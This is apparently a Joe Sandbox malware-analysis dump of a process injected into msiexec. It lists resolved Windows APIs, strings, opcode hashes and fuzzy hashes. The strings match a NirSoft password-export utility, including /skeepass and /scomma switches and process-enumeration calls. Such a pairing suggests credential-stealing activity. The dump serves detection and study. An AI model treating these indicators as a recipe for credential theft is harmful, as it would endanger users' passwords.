                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                                                      • String ID: |A
                                                                                                      • API String ID: 3356672799-1717621600
                                                                                                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp
                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                      • API String ID: 2081463915-1959339147
                                                                                                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                      • API String ID: 2012295524-70141382
                                                                                                      • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                      • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                      • API String ID: 667068680-3953557276
                                                                                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1700100422-0
                                                                                                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                      • String ID:
                                                                                                      • API String ID: 552707033-0
                                                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf
                                                                                                      • String ID: %%0.%df
                                                                                                      • API String ID: 3473751417-763548558
                                                                                                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                      APIs
                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                      • String ID: A
                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                      APIs
                                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                      • String ID: caption
                                                                                                      • API String ID: 973020956-4135340389
                                                                                                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                      APIs
                                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                      • String ID: \systemroot
                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy
                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                      • API String ID: 1284135714-318151290
                                                                                                      • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                      • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                      • String ID: 4$h
                                                                                                      • API String ID: 4019544885-1856150674
                                                                                                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                      • String ID: 0$6
                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 290601579-0
                                                                                                      • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                      • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                      APIs
                                                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                      • memset.MSVCRT ref: 0044505E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                      • String ID: PD$PD
                                                                                                      • API String ID: 1581201632-2312785699
                                                                                                      • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                      • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 2163313125-0
                                                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$wcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3592753638-3916222277
                                                                                                      • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                      • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                      • String ID: %s (%s)$YV@
                                                                                                      • API String ID: 3979103747-598926743
                                                                                                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
